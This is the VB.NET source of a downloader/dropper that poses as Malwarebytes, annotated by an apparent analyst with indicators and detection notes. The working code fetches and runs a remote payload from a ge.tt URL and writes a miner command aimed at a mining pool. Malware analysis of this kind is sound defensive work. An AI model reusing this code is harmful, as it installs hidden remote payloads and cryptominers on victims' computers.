Imports System
Imports System.Data
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Text
Imports System.Reflection.Emit
Imports Microsoft.VisualBasic
Imports Microsoft.Win32
Imports System.IO
Imports System.Net
Imports System.Threading
Imports System.Windows.Forms
Imports System.Security.Cryptography
Imports System.IO.Compression
Imports System.Collections.Generic
' Assembly version-info metadata. Every descriptive field below presents the compiled
' binary as a Malwarebytes anti-malware product, while the code in Module1 creates
' files under C:\ProgramData, downloads an executable and runs it.
' NOTE(analysis): these strings are chosen by whoever compiles the file and say nothing
' about origin. For triage, rely on the Authenticode signature and its publisher, not on
' the version-info resource. The "MalwareBytes" casing also differs from the vendor's
' usual "Malwarebytes" spelling, which can serve as a cheap hunting pivot.
<Assembly: AssemblyTitle("MalwareBytes Anti-Malware")>
<Assembly: AssemblyDescription("A malware removal tool.")>
<Assembly: AssemblyCompany("MalwareBytes Inc.")>
<Assembly: AssemblyProduct("MalwareBytes Anti-Malware")>
<Assembly: AssemblyCopyright("©2012 MalwareBytes Inc.")>
<Assembly: AssemblyTrademark("MalwareBytes Inc. All rights reserved.")>
<Assembly: AssemblyVersion("12.01.32")>
<Assembly: AssemblyFileVersion("12.01.32.00")>
' Module1 - analyst annotation of a downloader/dropper sample.
' Summary of what the visible code does, in order:
'   1. creates a staging directory C:\ProgramData\Intel\IntelUpdate,
'   2. writes a batch file (as2.bat) there containing one command line,
'   3. downloads a Base64 text blob over HTTP, decodes it and writes it as intel.exe,
'   4. starts intel.exe, waits about 20 seconds, then tries to delete it.
' Host indicators visible in this file: the staging directory, as2.bat, intel.exe.
' Network indicators visible in this file: us3.eclipsemc.com:8337 and the ge.tt URL.
' No persistence (autostart) code is present in this module.
Module Module1
' P/Invoke declaration for user32!FindWindow. It is declared but never called
' anywhere in this module.
<DllImport("user32.dll", SetLastError:=True, CharSet:=CharSet.Auto)> _
Private Function FindWindow( _
ByVal lpClassName As String, _
ByVal lpWindowName As String) As IntPtr
End Function
' Author's note, translated from Greeklish: "do not forget to fix the startup,
' because it is badly broken". Consistent with the absence of any autostart code below.
' Entry point: stages the batch file, fetches the payload, runs it and removes it.
Sub Main()
' Key passed to CustomXOR_Decrypt. The literal is Greeklish for "the key goes here",
' so this source is presumably a template whose key is filled in before compilation
' - TODO confirm against compiled samples.
dim klidi as string ="EDW TO KLIDI"
' Create the staging directories if they do not exist yet. The path mixes "\" and "/"
' separators; the folder names resemble an Intel updater directory.
If My.Computer.FileSystem.DirectoryExists("C:\ProgramData/Intel") Then
'do thing
Else
My.Computer.FileSystem.CreateDirectory("C:\ProgramData/Intel")
End If
If My.Computer.FileSystem.DirectoryExists("C:\ProgramData/Intel/IntelUpdate") Then
'do thing
Else
My.Computer.FileSystem.CreateDirectory("C:\ProgramData/Intel/IntelUpdate")
End If
' File.Create truncates an existing as2.bat, so the ReadToEnd below returns an
' empty string and the file ends up holding only the lines appended here.
File.Create("C:\ProgramData/Intel/IntelUpdate/as2.bat").Dispose()
Dim sb As New StringBuilder()
Using sr As New StreamReader("C:\ProgramData/Intel/IntelUpdate/as2.bat")
sb.AppendLine("@echo off")
sb.AppendLine(vbNewLine)
' NOTE(analysis): the arguments (-o URL, -u account, -p password) do not follow the
' Windows rundll32 syntax (DLL name, entry point); they look like a coin-miner command
' line pointed at a mining pool, so "Rundll32.exe" is presumably a renamed miner
' binary - TODO confirm. The host:port and the account name are usable as indicators.
sb.AppendLine("Rundll32.exe -a 5 -g no -o http://us3.eclipsemc.com:8337 -u orion_2 -p 18731873")
sb.Append(sr.ReadToEnd())
sb.AppendLine()
sb.AppendLine()
End Using
Using outfile As New StreamWriter("C:\ProgramData/Intel/IntelUpdate/as2.bat")
outfile.Write(sb.ToString())
End Using
' as2.bat is only written here; nothing in this module executes it.
System.Threading.Thread.Sleep(593)
' Download stage: the response body is treated as Base64 text and decoded to bytes.
' NOTE(analysis): the URL literal appears in clear text although CustomXOR_Decrypt
' parses its input as hex pairs, which again suggests a template; a compiled sample
' may carry a hex string instead of this URL, so string-based detections should not
' depend on the clear-text URL alone - TODO confirm.
Dim miagic As New WebClient
Dim ggffff As String = miagic.DownloadString(CustomXOR_Decrypt("http://ge.tt/api/1/files/7InUjLa/0/blob?download",klidi))
' The decoded bytes are written as intel.exe (False = overwrite, do not append).
' The payload arrives as text rather than as a PE file, so network inspection that
' looks for executable headers in the response would not see one.
My.Computer.FileSystem.WriteAllBytes("C:\ProgramData/Intel/IntelUpdate/intel.exe", Convert.FromBase64String(ggffff), False)
System.Threading.Thread.Sleep(1593)
' Launch the dropped file. Detection pivot: process creation with an image path
' under C:\ProgramData\Intel\IntelUpdate\.
If My.Computer.FileSystem.FileExists("C:\ProgramData/Intel/IntelUpdate/intel.exe") Then
Dim program1 As System.Diagnostics.ProcessStartInfo
Dim startprogram1 As New System.Diagnostics.Process
Dim program1file As String = "C:\ProgramData/Intel/IntelUpdate/intel.exe"
program1 = New System.Diagnostics.ProcessStartInfo(program1file)
startprogram1.StartInfo = program1
startprogram1.Start()
System.Threading.Thread.Sleep(1593)
End If
' Cleanup after a fixed 20-second wait: the dropped executable is deleted.
' NOTE(forensics): if the child process is still running at this point the delete
' probably fails and intel.exe stays on disk; as2.bat and the directories are never
' removed by this module.
System.Threading.Thread.Sleep(20000)
If My.Computer.FileSystem.FileExists("C:\ProgramData/Intel/IntelUpdate/intel.exe") Then
My.Computer.FileSystem.DeleteFile("C:\ProgramData/Intel/IntelUpdate/intel.exe")
End If
End Sub
' String de-obfuscation helper: repeating-key XOR over a hex-encoded input.
' Input: text read two characters at a time, each pair parsed as one hex byte.
' pass:  key text; its ASCII bytes are hashed with MD5 and the digest is the XOR key.
' Returns the decoded characters as a string.
' This is obfuscation rather than encryption: the key travels with the binary, so the
' hidden strings can be recovered statically during analysis.
Public Function CustomXOR_Decrypt(ByVal Input As String, ByVal pass As String) As String
Dim out As New System.Text.StringBuilder
Dim Hash As New System.Security.Cryptography.MD5CryptoServiceProvider
Dim XorHash As Byte() = Hash.ComputeHash(System.Text.Encoding.ASCII.GetBytes(pass))
' u is the current index into the digest; it starts at 0.
Dim u As Integer
For i As Integer = 0 To Input.Length - 1 Step +2
' "&H" plus two characters is implicitly converted to a number (hex literal syntax),
' XORed with the current digest byte and turned into a character with Chr.
Dim tmp As String = Chr(("&H" & Input.Substring(i, 2)) Xor XorHash(u))
out.Append(tmp)
' The key index wraps at pass.Length, not at the digest length, so only the first
' pass.Length digest bytes are used; an analyst's decoder must wrap the same way.
If u = pass.Length - 1 Then u = 0 Else u = u + 1
Next
Return out.ToString
End Function
End Module